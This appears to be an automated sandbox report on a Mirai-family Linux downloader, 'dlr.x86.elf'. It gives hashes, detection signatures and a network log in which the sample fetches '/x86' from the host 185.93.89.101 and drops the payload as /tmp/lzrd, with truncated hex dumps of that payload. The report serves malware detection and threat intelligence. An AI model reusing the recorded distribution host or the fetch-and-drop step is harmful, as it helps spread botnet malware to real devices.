Edit tour

Linux Analysis Report
dlr.x86.elf

Overview

General Information

Sample name:dlr.x86.elf
Analysis ID:1612187
MD5:a5ab999d896f6af55ad8e1c3054fd021
SHA1:2e46dc946d4202220692cbd716dd43f4843f401e
SHA256:dcd06bb8d4b63204470b19dfa7d9853c28c182fe41340dace72d39fd0d5954af
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Machine Learning detection for dropped file
Machine Learning detection for sample
ELF contains segments with high entropy indicating compressed/encrypted content
HTTP GET or POST without a user agent
Sample has stripped symbol table
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1612187
Start date and time:2025-02-11 16:06:46 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.x86.elf
Detection:MAL
Classification:mal64.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.x86.elf
PID:5531
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
LIZRD
lzrd
Standard Error:
  • system is lnxubuntu20
  • dlr.x86.elf (PID: 5531, Parent: 5449, MD5: a5ab999d896f6af55ad8e1c3054fd021) Arguments: /tmp/dlr.x86.elf
  • cleanup
SourceRuleDescriptionAuthorStrings
dlr.x86.elfLinux_Trojan_Mirai_88a1b067unknownunknown
  • 0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10
SourceRuleDescriptionAuthorStrings
5531.1.0000000008049000.000000000804a000.rw-.sdmpLinux_Trojan_Mirai_88a1b067unknownunknown
  • 0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10
5531.1.0000000008048000.0000000008049000.r-x.sdmpLinux_Trojan_Mirai_88a1b067unknownunknown
  • 0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: dlr.x86.elfReversingLabs: Detection: 42%
Source: /tmp/lzrdJoe Sandbox ML: detected
Source: dlr.x86.elfJoe Sandbox ML: detected
Source: global trafficHTTP traffic detected: GET /x86 HTTP/1.0Data Raw: 00 00 00 00 00 2e 73 68 73 74 72 74 Data Ascii: .shstrt
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: unknownTCP traffic detected without corresponding DNS query: 185.93.89.101
Source: global trafficHTTP traffic detected: GET /x86 HTTP/1.0Data Raw: 00 00 00 00 00 2e 73 68 73 74 72 74 Data Ascii: .shstrt

System Summary

barindex
Source: dlr.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: 5531.1.0000000008049000.000000000804a000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: 5531.1.0000000008048000.0000000008049000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: ELF static info symbol of initial sample.symtab present: no
Source: dlr.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: 5531.1.0000000008049000.000000000804a000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: 5531.1.0000000008048000.0000000008049000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: classification engineClassification label: mal64.linELF@0/1@0/0
Source: /tmp/dlr.x86.elf (PID: 5531)File written: /tmp/lzrdJump to dropped file
Source: lzrd.12.drDropped file: segment LOAD with 7.9025 entropy (max. 8.0)
Source: lzrd.12.drDropped file: segment LOAD with 7.9638 entropy (max. 8.0)
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Obfuscated Files or Information
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612187 Sample: dlr.x86.elf Startdate: 11/02/2025 Architecture: LINUX Score: 64 11 185.93.89.101, 53766, 80 TS-EMEA-ASNGB United Kingdom 2->11 13 Malicious sample detected (through community Yara rule) 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 Machine Learning detection for sample 2->17 19 Machine Learning detection for dropped file 2->19 6 dlr.x86.elf 2->6         started        signatures3 process4 file5 9 /tmp/lzrd, ELF 6->9 dropped

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
dlr.x86.elf42%ReversingLabsLinux.Backdoor.Mirai
dlr.x86.elf100%Joe Sandbox ML
SourceDetectionScannerLabelLink
/tmp/lzrd100%Joe Sandbox ML
/tmp/lzrd21%ReversingLabsWin32.Trojan.Mirai
/tmp/lzrd22%VirustotalBrowse
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
185.93.89.101
unknownUnited Kingdom
200861TS-EMEA-ASNGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.93.89.101dlr.mips.elfGet hashmaliciousUnknownBrowse
  • /mips
dlr.arm7.elfGet hashmaliciousUnknownBrowse
  • /arm7
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
TS-EMEA-ASNGBdlr.mips.elfGet hashmaliciousUnknownBrowse
  • 185.93.89.101
dlr.arm7.elfGet hashmaliciousUnknownBrowse
  • 185.93.89.101
mpsl.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
arm7.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
185.93.89.101-mips-2025-02-11T10_20_14.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
mpsl.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
arm4.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
dlr.mips.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
rep.m68k.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
dlr.arm6.elfGet hashmaliciousMiraiBrowse
  • 185.93.89.106
No context
No context
Process:/tmp/dlr.x86.elf
File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
Category:dropped
Size (bytes):38896
Entropy (8bit):7.961564380782158
Encrypted:false
SSDEEP:768:rVSQ72xfCvEWG9bAWq4FXd/s6Qo8N4+stRh5nbcuyD7UoURw:rMQy1C49bs4Y6ZS4+Ivnouy8C
MD5:557ED6BC2E000935BEDAA35BF26EDCAA
SHA1:B57042ED9A7D7DBE1F7C7F32DE74D2B367EE835D
SHA-256:71670381C978C498DD4ABDA930AABE3C1E50A74ACD0B4B5D62A65FBDA65386C7
SHA-512:9A7170797E66B394FAF1EC4443AE83182AE9F7E3A0CFCFE1B44C7C22C2BB71F2883BA4CC4C5278BE1C25246F56DAB7A363AF6E837B32DE11B0B65C190A319E4C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 21%
  • Antivirus: Virustotal, Detection: 22%, Browse
Reputation:low
Preview:.ELF........................4...........4. ...(.........................@.........................................Q.td.............................j=.sfgaH........S...S......U..........?..k.I/.j....\.d*nlz.e....._../.+~.V....q...`.m.@.[..R.........A...._..X.O...$.G..J.......I.....*.m\'..._..P.@...b..^.....n.0{..:.....~.2R.>.-..0;g.3....=.|....Y.d.2.K.z.-.. x}.,..& ...O]J...]o F8>..:Q......=.>.?.2a..J..U.M..w...@?..x........}p4p......&.....9...S[.m..%....gB`...8........$o.Dr.l...2...:x.....+...AR3 .Ex..*..+...0.....E..S.T..y..H......m.|(..........GE...R....x.~.......I.S.0..9...h..\.6.Q.y]ZP.v...l...Z"8/3.}k....' ._..........A...OXn...m.8}.+.G...O.jA.bF..G+O..#n.v...e=Jj7%..Q}l..c@.z......qZ....f...yP..^0h.u..z.6S..R.w.. .(.......h...l.....m....+...q.S..WdFM#9"...TB.r<..X....L..4........4..s...o8j.....0.....8.._.~.u...kZ.`..&R'...8n...L}..;.wlX.F.-...j...&..5..d.h.......o.db....W><..l.n..7F..vz.Eo.,...6.H.H.-Dk..7|..9.6f.%.C.6...TZR\{IM8......
File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):5.388650498783721
TrID:
  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:dlr.x86.elf
File size:1'164 bytes
MD5:a5ab999d896f6af55ad8e1c3054fd021
SHA1:2e46dc946d4202220692cbd716dd43f4843f401e
SHA256:dcd06bb8d4b63204470b19dfa7d9853c28c182fe41340dace72d39fd0d5954af
SHA512:fd587b4c3ea6cde91f77d972dbe47fede9358ead72ea57ee50e42609c1ce8adf90b4813523a932202116f24b10a433bd991dce781cbb4f83bb7e78891c7d1bc7
SSDEEP:24:FlO/M4SeFHxgxk2ZO4l2ZWVuTRwvMmythGu92/4OTruQ2ONfn:fO/ZSU5wOewWVuTRwkmythh2/4mHZNv
TLSH:892121A2A2E8EC32CB6500FA5686AF461721CEA1395BFF1B8E514412ED381C0C533334
File Content Preview:.ELF........................4...........4. ...(.....................................................................Q.td............................U....U...E...........M...E........].....................................U......u.j..<........U......u.j..'.

ELF header

Class:ELF32
Data:2's complement, little endian
Version:1 (current)
Machine:Intel 80386
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x804831e
Flags:0x0
ELF Header Size:52
Program Header Offset:52
Program Header Size:32
Number of Program Headers:3
Section Header Offset:964
Section Header Size:40
Number of Section Headers:5
Header String Table Index:4
NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
NULL0x00x00x00x00x0000
.textPROGBITS0x80480940x940x2e10x00x6AX004
.rodataPROGBITS0x80483750x3750x2c0x10x32AMS001
.bssNOBITS0x80493a40x3a40x40x00x3WA004
.shstrtabSTRTAB0x00x3a40x1e0x00x0001
TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
LOAD0x00x80480000x80480000x3a10x3a15.80840x5R E0x1000.text .rodata
LOAD0x3a40x80493a40x80493a40x00x40.00000x6RW 0x1000.bss
GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Feb 11, 2025 16:07:33.137989044 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.143958092 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.144032955 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.144506931 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.153623104 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779387951 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779421091 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779432058 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779443026 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779453993 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779464006 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779479980 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779489040 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779500008 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779510975 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.779539108 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.779583931 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.779583931 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.779583931 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.784387112 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.784411907 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.784444094 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.784465075 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867762089 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867779016 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867820978 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867841959 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867847919 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867865086 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867877007 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867886066 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867887974 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867894888 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867902040 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.867903948 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867913961 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.867932081 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.868709087 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868721962 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868732929 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868743896 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868746042 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.868746042 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.868756056 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868762016 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.868776083 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.868978977 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.869653940 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869664907 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869676113 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869687080 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869698048 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869708061 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.869973898 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:33.870512009 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.870522976 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.870537043 CET8053766185.93.89.101192.168.2.15
Feb 11, 2025 16:07:33.871022940 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:34.308926105 CET5376680192.168.2.15185.93.89.101
Feb 11, 2025 16:07:34.314155102 CET8053766185.93.89.101192.168.2.15
Session IDSource IPSource PortDestination IPDestination Port
0192.168.2.1553766185.93.89.10180
TimestampBytes transferredDirectionData
Feb 11, 2025 16:07:33.144506931 CET45OUTGET /x86 HTTP/1.0
Data Raw: 00 00 00 00 00 2e 73 68 73 74 72 74
Data Ascii: .shstrt
Feb 11, 2025 16:07:33.779387951 CET1236INHTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Length: 38896
Content-Type: application/octet-stream
Last-Modified: Tue, 11 Feb 2025 05:20:24 GMT
Date: Tue, 11 Feb 2025 15:07:33 GMT
Data Raw: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 b8 94 06 08 34 00 00 00 00 00 00 00 00 00 00 00 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 00 80 04 08 00 10 00 00 40 87 01 00 06 00 00 00 00 10 00 00 01 00 00 00 00 00 00 00 00 10 06 08 00 10 06 08 f1 96 00 00 f1 96 00 00 05 00 00 00 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 09 6a 3d 95 73 66 67 61 48 12 0d 0c 00 00 00 00 f0 53 01 00 f0 53 01 00 94 00 00 00 55 00 00 00 0e 00 00 00 18 03 00 3f 91 d0 6b 8f 49 2f fa 6a e4 07 9a 89 5c 84 64 2a 6e 6c 7a 90 65 85 06 89 8c 96 5f a3 c2 2f 96 2b 7e 07 56 89 d0 1c 8d 71 da c3 f3 60 d2 6d 9d 40 8d 5b 0b 1d 52 80 83 e0 02 9f 1b b9 c5 c5 41 bc 2e e5 0b 5f cf c0 58 ea 80 4f f6 bb 9c 24 87 47 1d e8 4a 01 00 f9 82 00 00 0e 49 06 00 18 03 00 2a a3 6d 5c 27 81 a8 15 5f 95 c7 50 8a 40 85 cf 0f 62 95 8b 5e c7 87 a2 16 18 fb 6e e9 30 7b d9 b2 e1 3a e8 83 09 b3 80 bb 7e d0 32 52 91 3e ac 2d ee db 30 3b 67 [TRUNCATED]
Data Ascii: ELF44 (@Qtdj=sfgaHSSU?kI/j\d*nlze_/+~Vq`m@[RA._XO$GJI*m\'_P@b^n0{:~2R>-0;g3=|Yd2Kz- x},& O]J]o F8>:Q=>?2aJUMw@?x}p4p&9S[m%gB`8$oDrl2:x+AR3 Ex*+0ESTyHm|(GERx~IS09h\6Qy]ZPvlZ"8/3}k' _AOXnm8}+GOjAbFG+O#nve=Jj7%Q}lc@zqZfyP^0huz6SRw (hlm+qSWdFM#9"TBr<XL44so8j08_~ukZ`&R'8nL};wlXF-j&5dhodbW><ln7FvzEo,6HH-Dk7|96f%C6TZR\{IM8/6NqnS [TRUNCATED]
Feb 11, 2025 16:07:33.779421091 CET1236INData Raw: 5f b2 88 b3 b3 9d d1 08 a7 b5 03 2a 84 a5 43 f2 67 2f 51 22 5d 9c 20 39 5c cd 2c 9a d5 bd 91 8c 52 17 4d 00 26 80 35 9f 0b 1d 64 e6 4d 64 47 ec 44 bc 6f 29 e2 b3 51 81 f0 64 cc dd 61 6a c7 c2 fa b9 20 e8 3f 90 94 52 52 a5 09 ca 1b 70 74 eb a2 08
Data Ascii: _*Cg/Q"] 9\,RM&5dMdGDo)Qdaj ?RRpteg}$UjX1%o]WDwF`<gB1O"h78oz7MY%y(rqiT#^/e^Lnd''#ujt:X}E49uLyAo.XZ
Feb 11, 2025 16:07:33.779432058 CET1236INData Raw: 3b bb 2c 09 b2 91 74 c0 ed 54 0b 3b 7b 6f 5a 5f b7 97 33 9b 56 cc cb 77 f9 d8 8c 15 d7 d9 4a cf c1 87 ac b7 25 97 6a e5 6f 59 f7 4f 89 9d ec 29 06 c2 53 d7 7b eb 44 3a 64 c0 35 00 d1 9f bc 03 49 cd 05 5f 16 4f 56 d5 5c 6f 2f 8e 05 aa eb 45 d4 cd
Data Ascii: ;,tT;{oZ_3VwJ%joYO)S{D:d5I_OV\o/Enrf\N\:l5Rb,Qlc6X*`/aW;Q17tGPi4H=(&_8#C^2U&d__'Z.^B0c`8Uo
Feb 11, 2025 16:07:33.779443026 CET1236INData Raw: 4b 8c 7b c5 fb c5 7d 3b 78 d5 c1 99 52 67 a1 57 de 95 2b 18 da 78 19 86 1d 9d 62 f1 04 86 d5 ed 75 18 ed 3a fd 5a e8 c8 43 f4 88 f6 e1 5c 4c 72 a3 8e 93 8c 2d 93 84 49 32 79 fd b2 1d dd 32 d0 98 f4 67 6e d3 af 1a 6a 0b 25 d2 85 87 7c 7e 48 01 a6
Data Ascii: K{};xRgW+xbu:ZC\Lr-I2y2gnj%|~Hn:&#@=}{!o)[Z)-~duTW+t+*C{w77`GkL$%$u}HmwCEDUh]Kh]]BHpW:%'5CDL_Kb
Feb 11, 2025 16:07:33.779453993 CET1236INData Raw: ac e4 dc bc a1 5e c0 88 9e 53 b3 1f c6 c8 71 49 20 9a 8c 5b 1a 2b 8f f9 08 45 13 5d 36 86 41 7f cd ed 3e 5e 23 ee df 3e 20 e3 b9 dd 01 51 09 57 1e 6b 7e 0f c6 36 8f 20 8a d0 ff 2a 12 ae a9 16 e4 1b f5 0a 75 34 d1 bd e4 21 80 e4 79 3d b0 58 6c fc
Data Ascii: ^SqI [+E]6A>^#> QWk~6 *u4!y=Xl(.<]m^Dm:jcd,jd$=IFjGYOfq.>dFiWB]K: iL-@=t-y0e&Ut6\''
Feb 11, 2025 16:07:33.779464006 CET1236INData Raw: 71 6d 5f e9 77 83 f5 f6 c6 72 68 38 9c 81 01 72 ee 6d c5 60 3c 69 9e c7 8d 52 e0 b0 58 2f 60 00 ed 97 6f ea 9f 06 66 60 94 cd 23 c3 4d 74 9a a0 13 c2 8e a2 bd b2 31 19 e9 b0 51 62 67 6a a8 a7 99 56 0b e6 c0 98 f1 42 7f 53 75 87 5f 03 94 5e fa fe
Data Ascii: qm_wrh8rm`<iRX/`of`#Mt1QbgjVBSu_^b[-[t:.#<[2K[#N"C{Lh 9^Hu"u;2hV6\=(Z'D/H.Xthn/A@4AcSU-O[_Iu,`%ya.
Feb 11, 2025 16:07:33.779479980 CET1236INData Raw: a7 eb 48 ca a6 b7 b4 16 e6 3a d6 c5 f3 c4 52 f0 02 28 02 cb c3 6a af f9 ee f9 0e 04 42 68 16 57 4f ea b8 94 10 58 d3 42 15 e6 71 5e 3e 16 8e 5b f2 c2 20 c9 41 67 a2 39 6c 47 97 ec d3 cd d6 b4 f7 8d 0f d1 7f ad ba ff 21 be ae 66 f6 b4 5f d1 d2 fc
Data Ascii: H:R(jBhWOXBq^>[ Ag9lG!f_.BW~hl%IE?QKU~Vl2M&IZ6A#ME"T=1oW-k2f7x%[eNNb%;!n'+(]Va~0]_!u>-MEsU$du}
Feb 11, 2025 16:07:33.779489040 CET1236INData Raw: 93 85 41 5a 37 b9 88 1e 75 09 76 43 07 07 c3 5b 62 8f ad 50 3c 9e c4 16 58 a0 6c ee db 8a 89 0c 98 ae a9 a7 05 e2 68 87 36 8b 54 7c 06 9d 09 d7 3d 9c 7a 12 97 b5 af cf 67 12 5e ed 92 05 7a 52 23 17 cc 17 6c 09 dc 0d d0 dc 1c d6 80 83 49 0d 99 bc
Data Ascii: AZ7uvC[bP<Xlh6T|=zg^zR#lIQvTs(8O6rs c"[dxv>_SR3xrzSUy[ZCiQQi}k|lDdzv#s7x$B%UQXk2E>
Feb 11, 2025 16:07:33.779500008 CET1236INData Raw: 85 ec 3d dd ad 59 fe bf 06 e7 b1 f6 eb 24 42 52 40 74 5d 94 ab e9 9a 04 f2 f5 1c 25 74 d6 a3 4e ba b9 92 8e 95 c3 41 dc 3b 34 2f b3 f8 67 a9 4d 73 16 07 9d 33 a2 99 e8 ea c7 38 a0 3b 94 5d 5f f8 63 a6 8f c4 a8 82 59 01 a6 48 63 01 c1 a1 cb c6 7c
Data Ascii: =Y$BR@t]%tNA;4/gMs38;]_cYHc|>#]1{vlTP-Q 3-a9cx;L?Ff97f2_zBy3OD@f7':6n>,!K%JT;BNY
Feb 11, 2025 16:07:33.779510975 CET1236INData Raw: 52 10 ed 33 42 5c f2 c6 ad 6c 8b d4 1f fb b8 fd 17 88 44 67 d5 d6 69 cf 54 7d 9f a9 b8 9b 5e 09 a3 0d 04 bb 83 a2 a7 68 67 24 94 a5 8c db a8 00 97 60 d7 f9 84 36 1a 3f 7a fe 85 1a d4 f5 a8 44 cf 27 0c 77 04 cc ed 29 52 c5 53 e9 d9 40 2c c2 d4 11
Data Ascii: R3B\lDgiT}^hg$`6?zD'w)RS@,|G]1hDP3-FkKPq,>wb^ FH~2S?#Pf>1J*7/tu BQlA3\zc D^"%|e@i]lzy
Feb 11, 2025 16:07:33.784387112 CET1236INData Raw: c5 e2 73 4b 22 0c f3 df 34 6f cd c2 57 cd 5e 35 6c 84 6c cb 8e 5c b1 e8 94 f1 f1 e9 66 10 bb ea c8 a9 b9 a0 8a 31 e8 de 76 a4 2e 4d e5 96 a3 87 b5 d1 04 d3 0a c8 27 ca 50 e6 da b1 0d 9b 5e 8e b9 a8 a7 3f 0b ce f3 ef b8 a9 1c 1d b1 84 3c d1 2e 37
Data Ascii: sK"4oW^5ll\f1v.M'P^?<.7z.$g,y+T_GyOiD"`eMFYx,ahgVOOLl'M7!Mj?BYI%cj bC:9M08# iGO[


System Behavior

Start time (UTC):15:07:32
Start date (UTC):11/02/2025
Path:/tmp/dlr.x86.elf
Arguments:/tmp/dlr.x86.elf
File size:1164 bytes
MD5 hash:a5ab999d896f6af55ad8e1c3054fd021